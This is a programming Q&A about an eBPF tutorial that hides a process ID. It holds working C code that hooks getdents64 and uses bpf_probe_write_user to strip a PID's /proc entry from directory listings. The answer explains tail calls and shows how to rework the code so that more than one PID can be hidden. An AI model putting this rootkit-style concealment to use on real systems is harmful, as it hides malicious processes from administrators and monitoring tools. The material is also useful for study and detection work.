Tags: c, linux-kernel, ebpf, libbpf

bpf_probe_write_user() system overload


I'm pretty new to the eBPF world and I started learning from https://eunomia.dev/tutorials/0-introduce/.

I followed the examples and came across https://eunomia.dev/tutorials/24-hide/. This tutorial is about hiding a PID. One thing I found interesting in this example is the use of the function bpf_tail_call().

In the following code, if the PID is matched,

        int j = 0;
        for (j = 0; j < pid_to_hide_len; j++)
        {
            if (filename[j] != pid_to_hide[j])
            {
                break;
            }
        }
        if (j == pid_to_hide_len)
        {
            // ***********
            // We've found the folder!!!
            // Jump to handle_getdents_patch so we can remove it!
            // ***********
            bpf_map_delete_elem(&map_bytes_read, &pid_tgid);
            bpf_map_delete_elem(&map_buffs, &pid_tgid);
            bpf_tail_call(ctx, &map_prog_array, PROG_02);
            //
        }
        bpf_map_update_elem(&map_to_patch, &pid_tgid, &dirp, BPF_ANY);

        bpos += d_reclen;
    }

then it tail calls the following _patch function:

SEC("tp/syscalls/sys_exit_getdents64")
int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx)
{
    
    // Only patch if we've already checked and found our pid's folder to hide
    size_t pid_tgid = bpf_get_current_pid_tgid();
    long unsigned int *pbuff_addr = bpf_map_lookup_elem(&map_to_patch, &pid_tgid);
    if (pbuff_addr == 0)
    {
        return 0;
    }

    // Unlink the target by reading the previous linux_dirent64 struct
    // and setting its d_reclen to cover both itself and our target.
    // This makes the program reading the listing skip over our folder.
    long unsigned int buff_addr = *pbuff_addr;
    struct linux_dirent64 *dirp_previous = (struct linux_dirent64 *)buff_addr;
    short unsigned int d_reclen_previous = 0;
    bpf_probe_read_user(&d_reclen_previous, sizeof(d_reclen_previous), &dirp_previous->d_reclen);

    struct linux_dirent64 *dirp2 = (struct linux_dirent64 *)(buff_addr + d_reclen_previous);
    short unsigned int d_reclen2 = 0;
    bpf_probe_read_user(&d_reclen2, sizeof(d_reclen2), &dirp2->d_reclen);

    // Debug print
    char filename[MAX_PID_LEN];
    bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp_previous->d_name);
    filename[pid_to_hide_len - 1] = 0x00;
    bpf_printk("[PID_HIDE] filename previous %s\n", filename);
    bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp2->d_name);
    filename[pid_to_hide_len - 1] = 0x00;
    bpf_printk("[PID_HIDE] filename next one %s\n", filename);

    // Attempt to overwrite
    short unsigned int d_reclen_new = d_reclen_previous + d_reclen2;
    long ret = bpf_probe_write_user(&dirp_previous->d_reclen, &d_reclen_new, sizeof(d_reclen_new));

    // Send an event
    struct event *e;
    e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
    if (e)
    {
        e->success = (ret == 0);
        e->pid = (pid_tgid >> 32);
        bpf_get_current_comm(&e->comm, sizeof(e->comm));
        bpf_ringbuf_submit(e, 0);
    }

    bpf_map_delete_elem(&map_to_patch, &pid_tgid);

    return 0;
}

I don't understand the point of having a separate _patch function and calling it with bpf_tail_call(), which results in the getdents64 syscall returning.

In an attempt to get rid of bpf_tail_call(), I moved the logic from handle_getdents_patch() into handle_getdents_exit(), in place of the bpf_tail_call(). Below is how handle_getdents_exit() looks after my changes:

SEC("tp/syscalls/sys_exit_getdents64")
int handle_getdents_exit(struct trace_event_raw_sys_exit *ctx)
{
    size_t pid_tgid = bpf_get_current_pid_tgid();
    int total_bytes_read = ctx->ret;
    // if bytes_read is 0, everything's been read
    if (total_bytes_read <= 0)
    {
        return 0;
    }

    // Check we stored the address of the buffer from the syscall entry
    long unsigned int *pbuff_addr = bpf_map_lookup_elem(&map_buffs, &pid_tgid);
    if (pbuff_addr == 0)
    {
        return 0;
    }

    // All of this is quite complex, but basically boils down to
    // Calling 'handle_getdents_exit' in a loop to iterate over the file listing
    // in chunks of 200, and seeing if a folder with the name of our pid is in there.
    // If we find it, use 'bpf_tail_call' to jump to handle_getdents_patch to do the actual
    // patching
    long unsigned int buff_addr = *pbuff_addr;
    struct linux_dirent64 *dirp = 0;
    int pid = pid_tgid >> 32;
    short unsigned int d_reclen = 0;
    char filename[MAX_PID_LEN];

    unsigned int bpos = 0;
    unsigned int *pBPOS = bpf_map_lookup_elem(&map_bytes_read, &pid_tgid);
    if (pBPOS != 0)
    {
        bpos = *pBPOS;
        bpf_printk("bpos = *pBPOS -------> %d\n", bpos);
    }

    for (int i = 0; i < 200; i++)
    {
        if (bpos >= total_bytes_read)
        {
            break;
        }

        dirp = (struct linux_dirent64 *)(buff_addr + bpos);
        bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen);
        bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name);
        bpf_printk("> d_reclen : %d - filename : %s\n", pid_to_hide_len, filename);

        int j = 0;
        for (j = 0; j < pid_to_hide_len; j++)
        {
            if (filename[j] != pid_to_hide[j])
            {
                break;
            }
        }
        if (j == pid_to_hide_len)
        {
            // ***********
            // We've found the folder!!!
            // Jump to handle_getdents_patch so we can remove it!
            // ***********
            bpf_map_delete_elem(&map_bytes_read, &pid_tgid);
            bpf_map_delete_elem(&map_buffs, &pid_tgid);


            //
            long unsigned int buff_addr = *pbuff_addr;
            struct linux_dirent64 *dirp_previous = dirp;//(struct linux_dirent64 *)buff_addr;
            short unsigned int d_reclen_previous = 0;
            bpf_probe_read_user(&d_reclen_previous, sizeof(d_reclen_previous), &dirp_previous->d_reclen);

            struct linux_dirent64 *dirp2 = (struct linux_dirent64 *)(buff_addr + d_reclen_previous);
            short unsigned int d_reclen2 = 0;
            bpf_probe_read_user(&d_reclen2, sizeof(d_reclen2), &dirp2->d_reclen);

            // Attempt to overwrite
            short unsigned int d_reclen_new = d_reclen_previous + d_reclen2;
            long ret = bpf_probe_write_user(&dirp_previous->d_reclen, &d_reclen_new, sizeof(d_reclen_new));

            // bpf_tail_call(ctx, &map_prog_array, PROG_02);
            //
        }
        bpf_map_update_elem(&map_to_patch, &pid_tgid, &dirp, BPF_ANY);

        bpos += d_reclen;
    }



    // If we didn't find it, but there's still more to read,
    // jump back the start of this function and keep looking
    if (bpos < total_bytes_read)
    {
        bpf_map_update_elem(&map_bytes_read, &pid_tgid, &bpos, BPF_ANY);
        bpf_tail_call(ctx, &map_prog_array, PROG_01);
    }
    bpf_map_delete_elem(&map_bytes_read, &pid_tgid);
    bpf_map_delete_elem(&map_buffs, &pid_tgid);

    return 0;
}

The issue is that with this change in place, the system becomes extremely slow and the PID is not hidden.

What I'm trying to achieve is to hide more than one PID, but the call to bpf_tail_call() makes the syscall return on the first match. So here are my questions:

  • What am I doing wrong by removing handle_getdents_patch() and putting all the code in handle_getdents_exit()? Why is hiding the PID (even a single PID) broken, and what is causing the system overload?
  • What is the right way to achieve what I want?

PS : I tried to follow all the rules for asking a question, I hope I don't get punished.

Thanks


Solution

  • TL;DR. You didn't preserve the control flow of the programs. Tail calls don't return to their caller, so you should exit after the handle_getdents_patch logic.


    What You're Trying to Do

    If I understand correctly:

    • a first program intercepts sys_exit_getdents64 to find a folder to hide;
    • if it finds it, it tail calls (first tail call) into another BPF program, which edits the results with bpf_probe_write_user and sends an event to userspace;
    • otherwise, it keeps looking by tail calling itself (second tail call).

    And what you're trying to do is avoid the first tail call by moving the target code (handle_getdents_patch) into the caller (handle_getdents_exit).


    How Tail Calls Work

    Tail calls (bpf_tail_call) are not like normal function calls. Let's say a program A tail calls into program B. After program B is fully executed, control will not return to program A. We will simply exit.

    So in the case of the original program, handle_getdents_exit will jump to handle_getdents_patch when the folder is found. Once handle_getdents_patch is executed, it will not return to handle_getdents_exit to iterate on other folders.


    If you want to mimic the above tail call behavior when replacing handle_getdents_patch, you must therefore return 0 after the code you copied. So your code should look something like:

    if (j == pid_to_hide_len)
    {
        // ***********
        // We've found the folder!!!
        // Jump to handle_getdents_patch so we can remove it!
        // ***********
        bpf_map_delete_elem(&map_bytes_read, &pid_tgid);
        bpf_map_delete_elem(&map_buffs, &pid_tgid);
    
        [...]
    
        // Attempt to overwrite
        short unsigned int d_reclen_new = d_reclen_previous + d_reclen2;
        long ret = bpf_probe_write_user(&dirp_previous->d_reclen, &d_reclen_new, sizeof(d_reclen_new));
    
        [... other code from handle_getdents_patch...]
    
        return 0;
    }
    

    I don't know if it's on purpose, but you also didn't copy the code to send an event (bpf_ringbuf_reserve and co.).